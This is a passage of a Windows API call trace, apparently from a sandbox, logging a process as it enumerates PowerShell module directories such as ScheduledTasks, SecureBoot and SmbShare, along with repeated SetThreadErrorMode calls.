	[0047.431] FindNextFileW (in: hFindFile=0x1505fab7380, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.431] FindNextFileW (in: hFindFile=0x1505fab7380, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0047.431] FindClose (in: hFindFile=0x1505fab7380 | out: hFindFile=0x1505fab7380) returned 1
	[0047.431] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.432] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.432] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflowUtility", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflowUtility", lpFilePart=0x0) returned 0x44
	[0047.432] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.432] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflowUtility" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psworkflowutility"), fInfoLevelId=0x0, lpFileInformation=0x184c18ddc0 | out: lpFileInformation=0x184c18ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0047.432] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.432] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.432] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflowUtility", nBufferLength=0x105, lpBuffer=0x184c18d800, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflowUtility", lpFilePart=0x0) returned 0x44
	[0047.432] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflowUtility\\", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflowUtility\\", lpFilePart=0x0) returned 0x45
	[0047.432] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflowUtility\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab89a0
	[0047.432] FindNextFileW (in: hFindFile=0x1505fab89a0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.432] FindNextFileW (in: hFindFile=0x1505fab89a0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.432] FindNextFileW (in: hFindFile=0x1505fab89a0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.432] FindNextFileW (in: hFindFile=0x1505fab89a0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0047.433] FindClose (in: hFindFile=0x1505fab89a0 | out: hFindFile=0x1505fab89a0) returned 1
	[0047.433] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.433] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.433] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflowUtility\\PSWorkflowUtility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psworkflowutility\\psworkflowutility.psd1")) returned 0x20
	[0047.433] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.434] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ScheduledTasks\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7f80
	[0047.435] FindNextFileW (in: hFindFile=0x1505fab7f80, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.435] FindNextFileW (in: hFindFile=0x1505fab7f80, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.436] FindNextFileW (in: hFindFile=0x1505fab7f80, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.436] FindNextFileW (in: hFindFile=0x1505fab7f80, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.436] FindNextFileW (in: hFindFile=0x1505fab7f80, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.436] FindNextFileW (in: hFindFile=0x1505fab7f80, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.436] FindNextFileW (in: hFindFile=0x1505fab7f80, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.436] FindNextFileW (in: hFindFile=0x1505fab7f80, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.436] FindNextFileW (in: hFindFile=0x1505fab7f80, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0047.438] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.438] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.438] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.438] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ScheduledTasks\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7ce0
	[0047.439] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.439] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.439] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.439] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.439] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.439] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.439] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.439] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.440] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0047.440] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.440] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.440] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.441] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.441] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.441] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ScheduledTasks\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab7ec0
	[0047.442] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.442] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.442] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.442] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.442] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.443] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.443] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.443] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.443] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0047.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.444] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.446] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.446] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SecureBoot\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab8040
	[0047.446] FindNextFileW (in: hFindFile=0x1505fab8040, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.447] FindNextFileW (in: hFindFile=0x1505fab8040, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.447] FindNextFileW (in: hFindFile=0x1505fab8040, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.447] FindNextFileW (in: hFindFile=0x1505fab8040, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0047.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.447] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.447] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SecureBoot\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab72c0
	[0047.447] FindNextFileW (in: hFindFile=0x1505fab72c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.447] FindNextFileW (in: hFindFile=0x1505fab72c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.448] FindNextFileW (in: hFindFile=0x1505fab72c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.448] FindNextFileW (in: hFindFile=0x1505fab72c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0047.448] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.448] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.448] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.448] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.448] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.448] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SecureBoot\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab7a40
	[0047.448] FindNextFileW (in: hFindFile=0x1505fab7a40, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.448] FindNextFileW (in: hFindFile=0x1505fab7a40, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.449] FindNextFileW (in: hFindFile=0x1505fab7a40, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.449] FindNextFileW (in: hFindFile=0x1505fab7a40, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0047.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.449] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.449] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab87c0
	[0047.451] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.452] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.452] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.452] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.453] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.453] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.453] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.849] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.849] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.850] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.850] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.850] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.851] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.851] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.852] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.852] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.852] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.852] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.852] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.852] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.853] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.853] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.853] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.853] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.853] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.853] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.854] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.854] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.854] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.857] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.866] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.867] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.871] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.871] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.871] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.872] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.872] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.872] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.872] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.872] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.872] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.872] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.872] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.873] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.875] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.875] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.875] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.876] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.876] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.876] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.877] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.882] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.884] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.889] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.889] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.891] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.891] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.891] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.892] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.892] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.892] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.893] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.893] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.893] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.893] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18de70) returned 1
	[0047.893] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18de30) returned 1
	[0047.893] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dea0) returned 1
	[0047.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18ddf0) returned 1
	[0047.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18ddb0) returned 1
	[0047.894] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18de40) returned 1
	[0047.895] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd90) returned 1
	[0047.895] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0047.895] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18de40) returned 1
	[0047.895] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd90) returned 1
